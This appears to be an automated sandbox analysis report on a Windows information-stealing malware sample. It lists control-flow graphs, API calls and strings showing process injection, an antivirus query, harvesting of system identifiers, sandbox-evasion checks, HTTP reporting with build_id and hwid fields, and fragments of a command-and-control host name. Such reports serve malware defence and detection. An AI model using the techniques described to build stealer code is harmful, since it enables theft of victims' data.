                                                                control_flow_graph 851 418950-418957 852 41895d-418dca 851->852 853 418dcf-418e6e LoadLibraryA * 5 851->853 852->853 862 418e70-418ed9 853->862 863 418ede-418ee5 853->863 862->863 864 418eeb-418f99 863->864 865 418f9e-418fa5 863->865 864->865 868 419015-41901c 865->868 869 418fa7-419010 865->869 870 419022-4190a2 868->870 871 4190a7-4190ae 868->871 869->868 870->871 876 4190b4-419179 871->876 877 41917e-419185 871->877 876->877 880 4191f5-4191fc 877->880 881 419187-4191f0 877->881 885 419227-41922e 880->885 886 4191fe-419222 880->886 881->880 890 419230-419254 885->890 891 419259-419260 885->891 886->885 890->891 895 419345-41934c 891->895 896 419266-419340 891->896 905 4193a5-4193ac 895->905 906 41934e-4193a0 895->906 896->895 907 4193c0-4193c7 905->907 908 4193ae-4193bb 905->908 906->905 916 419420-419427 907->916 917 4193c9-41941b 907->917 908->907 923 419429-419435 916->923 924 41943a 916->924 917->916 923->924
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(004172CA), ref: 00418DD5
                                                                • LoadLibraryA.KERNEL32 ref: 00418E08
                                                                • LoadLibraryA.KERNEL32 ref: 00418E3B
                                                                • LoadLibraryA.KERNEL32 ref: 00418E4C
                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E5C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                • API String ID: 1029625771-2740034357
                                                                • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1023 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 1040 406000 1023->1040 1041 406006-40600c 1023->1041 1040->1041 1042 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 1041->1042 1043 4066ff-406727 call 408048 1041->1043 1042->1043 1121 4061a2-4061dc 1042->1121 1052 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 1043->1052 1053 406729-406761 call 410549 call 410609 call 41058d call 402920 1043->1053 1053->1052 1123 4061e2-4061e8 1121->1123 1124 4066f3 1121->1124 1125 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 427050 * 2 1123->1125 1126 4061ea-4061ff 1123->1126 1124->1043 1278 4066d2-4066ea InternetReadFile 1125->1278 1126->1125 1279 406692-40669a 1278->1279 1280 4066ec-4066ed InternetCloseHandle 1278->1280 1279->1280 1281 40669c-4066cd call 410609 call 41058d call 402920 1279->1281 1280->1124 1281->1278
                                                                APIs
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                  • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                • _memmove.LIBCMT ref: 00406639
                                                                • _memmove.LIBCMT ref: 00406662
                                                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$_memmove$CloseCrackFileHandleRead
                                                                • String ID: "$"$"$------$------$------$------$b26735cbe8ca9e75712ffe3aa40c4a60$build_id$mode
                                                                • API String ID: 510018941-2549312558
                                                                • Opcode ID: 69703cf7e32ee3cc6108c3b22d46cb8a654651e0a7b81b51028067c3f9b1e1af
                                                                • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                • Opcode Fuzzy Hash: 69703cf7e32ee3cc6108c3b22d46cb8a654651e0a7b81b51028067c3f9b1e1af
                                                                • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1287 411997-4119fb call 42f09d CoInitializeEx CoInitializeSecurity CoCreateInstance 1291 411a01-411a2d CoSetProxyBlanket 1287->1291 1292 411aa0-411aa5 1287->1292 1294 411a31-411a33 1291->1294 1293 411ab9 call 4104e7 1292->1293 1298 411abe-411ac5 call 42f142 1293->1298 1296 411a35-411a40 1294->1296 1297 411a99-411a9e 1294->1297 1299 411a93-411ab4 1296->1299 1300 411a42-411a57 1296->1300 1297->1293 1299->1293 1300->1299 1305 411a59-411a91 VariantInit call 411d42 call 4104e7 VariantClear 1300->1305 1305->1298
                                                                APIs
                                                                • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeVariant$BlanketClearCreateH_prolog3_catchInitInstanceProxySecurity
                                                                • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                • API String ID: 3060130021-315474579
                                                                • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1311 401284-401380 call 423c10 * 2 lstrcatA * 13 call 410c85 1317 401385-401389 1311->1317 1318 4013a5-4013a7 1317->1318 1319 40138b-40138d 1317->1319 1322 4013aa-4013ac 1318->1322 1320 4013a1-4013a3 1319->1320 1321 40138f-401395 1319->1321 1320->1322 1321->1318 1323 401397-40139f 1321->1323 1324 4013e9-4013f5 call 41d016 1322->1324 1325 4013ae-4013b4 call 410c53 1322->1325 1323->1317 1323->1320 1329 4013b9-4013bd 1325->1329 1330 4013d9-4013db 1329->1330 1331 4013bf-4013c1 1329->1331 1332 4013de-4013e0 1330->1332 1333 4013c3-4013c9 1331->1333 1334 4013d5-4013d7 1331->1334 1332->1324 1335 4013e2-4013e3 ExitProcess 1332->1335 1333->1330 1336 4013cb-4013d3 1333->1336 1334->1332 1336->1329 1336->1334
                                                                APIs
                                                                • _memset.LIBCMT ref: 004012A7
                                                                • _memset.LIBCMT ref: 004012B6
                                                                • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                  • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                  • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                  • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                • ExitProcess.KERNEL32 ref: 004013E3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                • String ID:
                                                                • API String ID: 2891980384-0
                                                                • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1337 404b2e-404bf3 call 410519 call 404ab6 call 4104e7 * 5 1354 404bf5 1337->1354 1355 404bfb-404c01 1337->1355 1354->1355 1356 405194-405236 call 402920 * 8 call 41d016 1355->1356 1357 404c07-404d91 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 1355->1357 1357->1356 1428 404d97-404dd1 1357->1428 1430 404dd7-404ddd 1428->1430 1431 405188 1428->1431 1432 404dfb-40511a call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 4104e7 call 4105c7 * 2 call 41058d call 402920 * 2 1430->1432 1433 404ddf-404df4 1430->1433 1431->1356 1539 40515c-405174 InternetReadFile 1432->1539 1433->1432 1540 405176-405183 InternetCloseHandle call 402920 1539->1540 1541 40511c-405124 1539->1541 1540->1431 1541->1540 1542 405126-405157 call 410609 call 41058d call 402920 1541->1542 1542->1539
                                                                APIs
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                  • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseCrackFileHandleRead
                                                                • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                • API String ID: 1110209605-858375883
                                                                • Opcode ID: efd3ad31af1dde764d0696b5195e0c6fd6f39412fd84f2ab020c7fb7797c676d
                                                                • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                • Opcode Fuzzy Hash: efd3ad31af1dde764d0696b5195e0c6fd6f39412fd84f2ab020c7fb7797c676d
                                                                • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1701 417041-4170da call 42e390 call 4104e7 call 410c53 call 410609 * 3 call 41058d call 402920 * 3 1722 4170e3-4170f4 1701->1722 1724 4170f6-4171ec call 4104e7 call 418111 call 410549 * 2 1722->1724 1725 4170dc 1722->1725 1735 4171f3-417208 1724->1735 1725->1722 1735->1735 1736 41720a 1735->1736 1737 417211-417226 1736->1737 1737->1737 1738 417228-41722d 1737->1738 1739 417234-417252 1738->1739 1739->1739 1740 417254-417256 1739->1740 1741 41725d-41727b 1740->1741 1741->1741 1742 41727d 1741->1742 1743 417284-41728f call 4181fd 1742->1743 1746 417291-41729a 1743->1746 1747 41729b-4172a6 call 418225 1746->1747 1750 4172a8-4172d1 call 402f12 call 418950 call 40113b 1747->1750 1757 417597-41774e call 411c4a call 41058d call 402920 call 4104e7 call 410609 call 4105c7 call 41058d call 402920 * 2 CreateDirectoryA call 401cfd call 4169b6 call 41824d call 416d8b call 41058d * 2 call 410519 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410519 call 4104e7 call 4109a2 call 410519 call 404b2e call 4139c2 1750->1757 1758 4172d7-417571 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 41257f 1750->1758 1877 417750 1757->1877 1878 41775b-41789e call 4104e7 call 401cfd call 405f39 call 41343f call 4104e7 call 401cfd call 405f39 call 413259 call 4104e7 call 401cfd call 405f39 call 413390 call 401cfd call 413b86 call 410519 call 4104e7 call 405237 call 401cfd call 40eabc 1757->1878 2005 417576-417578 1758->2005 1877->1878 1957 4178a0-417908 call 4104e7 call 401cfd call 405f39 call 4134d8 call 401cfd call 40274e 1878->1957 1958 41790e-417916 1878->1958 1957->1958 1960 417918-417989 call 4104e7 call 401cfd call 405f39 call 413198 call 401cfd call 41310c 1958->1960 1961 41798f-417a0d call 4104e7 call 401cfd call 405f39 call 4135a8 call 401cfd call 415392 1958->1961 1960->1961 2011 417a2d-417a34 1961->2011 2012 417a0f-417a2a call 401cfd call 41566f call 401cfd call 416fb7 1961->2012 2008 41757a-417584 call 41cc6c 2005->2008 2009 41758e-417592 call 402920 2005->2009 2008->2009 2009->1757 2017 417a36-417a4c call 401cfd call 415df7 2011->2017 2018 417a4f-417a56 2011->2018 2012->2011 2017->2018 2019 417a71-417a78 2018->2019 2020 417a58-417a6e call 401cfd call 416330 2018->2020 2025 417aa0-417aa6 2019->2025 2026 417a7a-417a93 call 401cfd call 4164bd 2019->2026 2020->2019 2032 417a95 2025->2032 2033 417aa8-417aaf 2025->2033 2026->2025 2032->2025 2038 417ab1-417ac7 call 401cfd call 411f55 2033->2038 2039 417aca-417ad1 2033->2039 2038->2039 2042 417ad3-417b44 call 4104e7 call 401cfd call 405f39 call 413198 call 401cfd call 41310c 2039->2042 2043 417b4a-417b8c call 4104e7 call 401cfd call 405f39 call 402920 call 40113b 2039->2043 2042->2043 2073 417ff0-41803d call 412541 call 401cfd call 418271 call 402920 * 2 2043->2073 2074 417b92-417e33 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 41257f 2043->2074 2099 41803e-418049 call 4130e9 2073->2099 2237 417fe7-417feb call 402920 2074->2237 2238 417e39-417f14 call 41cd21 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 2074->2238 2105 41804b-418054 2099->2105 2107 418055-418060 call 41536f 2105->2107 2113 418062-41806b 2107->2113 2115 41806c-418077 call 4181e2 2113->2115 2121 418079-418082 2115->2121 2123 418083-41808e call 4181a8 2121->2123 2129 418090-41809c 2123->2129 2131 41809e-4180b1 call 402920 * 2 2129->2131 2141 4180b3 2131->2141 2144 4180ba-4180cd call 402920 * 2 2141->2144 2153 4180cf-418110 call 416d8b call 401cde call 402920 * 2 call 41d016 2144->2153 2237->2073 2274 417f15-417f20 call 418225 2238->2274 2277 417f22-417fd0 call 4104e7 call 410519 * 3 call 405482 call 413198 call 401cfd call 41310c 2274->2277 2294 417fd1-417fdc call 4130e9 2277->2294 2297 417fde-417fe2 call 402920 2294->2297 2297->2237
                                                                APIs
                                                                  • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                  • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                  • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                  • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                  • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(?,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                  • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                  • Part of subcall function 004139C2: strtok_s.MSVCRT ref: 004139F3
                                                                  • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                  • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: strtok_s$CreateHeap$AllocDirectoryFirstH_prolog3_catch_NameProcessProcess32SnapshotToolhelp32User
                                                                • String ID: .exe$.exe$_DEBUG.zip$b26735cbe8ca9e75712ffe3aa40c4a60$cowod.$hopto$http://$org
                                                                • API String ID: 2072274150-1499729979
                                                                • Opcode ID: aad260dc88e32554c7ca58c5124fbaaa84584415b86235e9da2d33aac3934208
                                                                • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                • Opcode Fuzzy Hash: aad260dc88e32554c7ca58c5124fbaaa84584415b86235e9da2d33aac3934208
                                                                • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2347 411203-41127b call 4104e7 RegOpenKeyExA 2350 411281 2347->2350 2351 411478-4114a4 call 410519 call 402920 call 41d016 2347->2351 2352 411287-4112be RegEnumKeyExA 2350->2352 2354 4112c4-411304 RegOpenKeyExA 2352->2354 2355 41144c-411458 2352->2355 2363 411460 2354->2363 2364 41130a-41133a RegQueryValueExA 2354->2364 2355->2352 2357 41145e 2355->2357 2361 41146c 2357->2361 2361->2351 2363->2361 2366 411440 2364->2366 2367 411340-411350 2364->2367 2366->2355 2367->2366 2369 411356-4113e4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 RegQueryValueExA 2367->2369 2369->2366 2382 4113e6-41143b call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 2369->2382 2382->2366
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: OpenQueryValue$Enum
                                                                • String ID: - $%s\%s$?
                                                                • API String ID: 2712010499-3278919252
                                                                • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2428 4115d4-41162e call 423c10 RegOpenKeyExA 2431 411651-411683 CharToOemA call 41d016 2428->2431 2432 411630-41164b RegQueryValueExA 2428->2432 2432->2431
                                                                APIs
                                                                • _memset.LIBCMT ref: 00411607
                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                • CharToOemA.USER32(?,?), ref: 0041166B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CharOpenQueryValue_memset
                                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                • API String ID: 2355623204-1211650757
                                                                • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                APIs
                                                                • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                • _wtoi64.MSVCRT ref: 004117C1
                                                                • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                • String ID:
                                                                • API String ID: 181426013-0
                                                                • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                • _memset.LIBCMT ref: 004010D0
                                                                • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                • ExitProcess.KERNEL32 ref: 00401112
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                • String ID:
                                                                • API String ID: 1859398019-0
                                                                • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                APIs
                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                  • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                  • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                  • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                  • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentInformationProfileVolume_memsetmallocstrncpy
                                                                • String ID: wA$:\$C$QuBi
